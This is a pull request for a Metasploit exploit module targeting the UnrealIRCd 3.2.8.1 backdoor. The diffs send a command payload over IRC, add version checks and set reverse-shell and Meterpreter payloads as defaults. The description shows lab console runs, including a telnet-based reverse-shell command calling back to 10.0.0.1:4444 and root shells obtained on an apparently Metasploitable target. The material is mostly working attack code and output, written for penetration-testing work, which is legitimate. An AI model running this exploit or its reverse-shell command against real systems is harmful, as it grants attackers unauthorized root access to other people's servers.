### PR TITLE
Unreal_ircd_3281_backdoor: Add checks & targets

### DIFF
--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
@@ -25,20 +25,29 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'OSVDB', '65445' ],
           [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
         ],
-        'Platform' => ['unix'],
+        'Platform' => 'unix',
         'Arch' => ARCH_CMD,
         'Privileged' => false,
         'Payload' => {
           'Space' => 1024,
-          'DisableNops' => true,
-          'Compat' =>
-                        {
-                          'PayloadType' => 'cmd',
-                          'RequiredCmd' => 'generic perl ruby telnet',
-                        }
+          'DisableNops' => true
         },
         'Targets' => [
-          [ 'Automatic Target', {}]
+          [
+            'Automatic Target',
+            {
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              },
+              'Payload' => {
+                'Compat' => {
+                    'PayloadType' => 'cmd',
+                    'RequiredCmd' => 'generic perl ruby telnet',
+                }
+              }
+            }
+          ]
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2010-06-12',

--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'OSVDB', '65445' ],
           [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
         ],
-        'Platform' => 'unix',
+        'Platform' => [ 'unix', 'linux' ],
         'Arch' => ARCH_CMD,
         'Privileged' => false,
         'Payload' => {
@@ -34,18 +34,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [
           [
-            'Automatic Target',
+            'Linux/Unix Command',
             {
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse'
+                'PAYLOAD' => 'cmd/linux/http/x86/meterpreter/reverse_tcp'
               },
-              'Payload' => {
-                'Compat' => {
-                    'PayloadType' => 'cmd',
-                    'RequiredCmd' => 'generic perl ruby telnet',
-                }
-              }
             }
           ]
         ],

--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
@@ -45,6 +45,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2010-06-12',
+        'DefaultOptions' => {
+          'wfsDelay' => 30
+        },
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
           'Stability' => UNKNOWN_STABILITY,
@@ -120,18 +123,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Sending IRC backdoor command")
     sock.put("AB;" + payload.encoded + "\n")
-
-    # Wait for the request to be handled
-    # 120 loops * 0.25 seconds = total 30 seconds
-    vprint_status("Waiting for trigger")
-    1.upto(120) do
-      break if session_created?
-      select(nil, nil, nil, 0.25)
-    end
-
-    vprint_status('Done!')
-
-    handler()
 
     # Finished with IRC
     disconnect

--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
@@ -63,15 +63,20 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check_irc_command(cmd)
-    vprint_status("Checking #{cmd}")
-    sock.put("#{cmd}\n")
+  def unreal_version?(response)
+    response.match?(/unreal3\.2\.8\.1/i)
+  end
+
+  def send_irc_command(cmd="")
+    unless cmd.empty?
+      vprint_status("#{cmd}")
+      sock.put("#{cmd}\n")
+    end
     r = sock.get_once(-1, 10).to_s
-    r.to_s.split("\n").each do |line|
+    r.split("\n").each do |line|
       vprint_line("    #{line}")
     end
-    return Exploit::CheckCode::Vulnerable if r.downcase.include?("unreal3.2.8.1")
-    return Exploit::CheckCode::Appearsif if r.downcase.include?("unreal")
+    r
   end
 
   def check
@@ -80,37 +85,18 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Connected to #{rhost}:#{rport}")
 
     vprint_status("Checking IRC banner")
-    banner = sock.get_once(-1, 10).to_s
-    banner.to_s.split("\n").each do |line|
-      vprint_line("    #{line}")
-    end
-    return Exploit::CheckCode::Vulnerable if banner.downcase.include?("unreal3.2.8.1")
-    return Exploit::CheckCode::Appearsif if banner.downcase.include?("unreal")
+    return Exploit::CheckCode::Appears if unreal_version?(send_irc_command)
 
-    irc_user = rand_text_alpha(6).downcase
-    vprint_status("Trying to register a new IRC user: #{irc_user}")
-    sock.put("NICK #{irc_user}\n")
+    irc_user = Faker::Internet.username(specifier: 3..9)
+    print_status("Trying to register a new IRC user: #{irc_user}")
+    send_irc_command("NICK #{irc_user}")
     # Not checking for PING/PONG
-    sock.put("USER #{irc_user} 0 * #{irc_user}\n")
-    register = sock.get_once(-1, 10).to_s
-    register.to_s.split("\n").each do |line|
-      vprint_line("    #{line}")
-    end
-    return Exploit::CheckCode::Vulnerable if register.downcase.include?("unreal3.2.8.1")
-    return Exploit::CheckCode::Appearsif if register.downcase.include?("unreal")
+    response = send_irc_command("USER #{irc_user} 0 * #{irc_user}")
+    return Exploit::CheckCode::Appears if unreal_version?(response)
 
-    check_irc_command("VERSION")
-    check_irc_command("INFO")
-    check_irc_command("CREDITS")
-    check_irc_command("MOTD") # May not have a value
-    check_irc_command("BOTMOTD") # May not have a value
-    check_irc_command("HELP") # May not give version
-    #check_irc_command("MAP") # hostname
-    #check_irc_command("LINKS") # hostname
-    #check_irc_command("TIME") # ...enum
-    #check_irc_command("RULES") # ...enum
-    #check_irc_command("ADMIN") # hostname
-    check_irc_command("LICENSE") # Service name
+    commands = %w[VERSION INFO CREDITS MOTD BOTMOTD HELP LICENSE]
+    return Exploit::CheckCode::Appears if
+      commands.any? { |cmd| unreal_version?(send_irc_command(cmd)) }
 
     return Exploit::CheckCode::Safe
   end

--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
@@ -57,6 +57,58 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def check_irc_command(cmd)
+    vprint_status("Checking #{cmd}")
+    sock.put("#{cmd}\n")
+    r = sock.get_once(-1, 10).to_s
+    r.to_s.split("\n").each do |line|
+      vprint_line("    #{line}")
+    end
+    return Exploit::CheckCode::Vulnerable if r.downcase.include?("unreal3.2.8.1")
+    return Exploit::CheckCode::Appearsif if r.downcase.include?("unreal")
+  end
+
+  def check
+    vprint_status("Connecting to IRC service")
+    connect
+    print_status("Connected to #{rhost}:#{rport}")
+
+    vprint_status("Checking IRC banner")
+    banner = sock.get_once(-1, 10).to_s
+    banner.to_s.split("\n").each do |line|
+      vprint_line("    #{line}")
+    end
+    return Exploit::CheckCode::Vulnerable if banner.downcase.include?("unreal3.2.8.1")
+    return Exploit::CheckCode::Appearsif if banner.downcase.include?("unreal")
+
+    irc_user = rand_text_alpha(6).downcase
+    vprint_status("Trying to register a new IRC user: #{irc_user}")
+    sock.put("NICK #{irc_user}\n")
+    # Not checking for PING/PONG
+    sock.put("USER #{irc_user} 0 * #{irc_user}\n")
+    register = sock.get_once(-1, 10).to_s
+    register.to_s.split("\n").each do |line|
+      vprint_line("    #{line}")
+    end
+    return Exploit::CheckCode::Vulnerable if register.downcase.include?("unreal3.2.8.1")
+    return Exploit::CheckCode::Appearsif if register.downcase.include?("unreal")
+
+    check_irc_command("VERSION")
+    check_irc_command("INFO")
+    check_irc_command("CREDITS")
+    check_irc_command("MOTD") # May not have a value
+    check_irc_command("BOTMOTD") # May not have a value
+    check_irc_command("HELP") # May not give version
+    #check_irc_command("MAP") # hostname
+    #check_irc_command("LINKS") # hostname
+    #check_irc_command("TIME") # ...enum
+    #check_irc_command("RULES") # ...enum
+    #check_irc_command("ADMIN") # hostname
+    check_irc_command("LICENSE") # Service name
+
+    return Exploit::CheckCode::Safe
+  end
+
   def exploit
     connect
 

--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
@@ -110,24 +110,27 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    # Connect to the IRC service
+    vprint_status("Connecting to IRC service")
     connect
+    print_status("Connected to #{rhost}:#{rport}")
 
-    print_status("Connected to #{rhost}:#{rport}...")
-    banner = sock.get_once(-1, 30)
-    banner.to_s.split("\n").each do |line|
-      print_line("    #{line}")
-    end
-
-    print_status("Sending backdoor command...")
+    print_status("Sending IRC backdoor command")
     sock.put("AB;" + payload.encoded + "\n")
 
     # Wait for the request to be handled
+    # 120 loops * 0.25 seconds = total 30 seconds
+    vprint_status("Waiting for trigger")
     1.upto(120) do
       break if session_created?
-
       select(nil, nil, nil, 0.25)
-      handler()
     end
+
+    vprint_status('Done!')
+
+    handler()
+
+    # Finished with IRC
     disconnect
   end
 end


### PR DESCRIPTION
## After

**Setup**:

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/irc/unreal_ircd_3281_backdoor; options; show targets'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/unix/reverse

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command (Generic)



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Unix Command (Generic)
    1   Unix Command


msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
```

**Check**:

```console
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > check
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: swqkly
    :irc.Metasploitable.LAN 001 swqkly :Welcome to the TestIRC IRC Network swqkly!swqkly@10.0.0.1
    :irc.Metasploitable.LAN 002 swqkly :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
    :irc.Metasploitable.LAN 003 swqkly :This server was created Sun May 20 2012 at 14:04:37 EDT
    :irc.Metasploitable.LAN 004 swqkly irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.Metasploitable.LAN 005 swqkly UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.Metasploitable.LAN 005 swqkly WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.Metasploitable.LAN 005 swqkly EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[+] 10.0.0.10:6667 - The target is vulnerable.
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
```

**Target 0**:

```console
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[+] sh -c '(sleep 3819|telnet 10.0.0.1 4444|while : ; do sh && break; done 2>&1|telnet 10.0.0.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] 10.0.0.10:6667 - Waiting for trigger
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iXVXTfgtLX5424Iq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iXVXTfgtLX5424Iq\r\n"
[*] Matching...
[*] A is input...
[*] 10.0.0.10:6667 - Done!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:60363) at 2026-02-10 20:33:24 +0000

id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.10 - Command shell session 1 closed.  Reason: User exit
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
```

**Target 1**:

```console
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set TARGET 1
TARGET => 1
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS   10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    6667             yes       The target port (TCP)


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] 10.0.0.10:6667 - Waiting for trigger
[*] Sending stage (23408 bytes) to 10.0.0.10
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.10:60365) at 2026-02-10 20:33:55 +0000
[*] 10.0.0.10:6667 - Done!

meterpreter >
meterpreter > shell
Process 5385 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
```
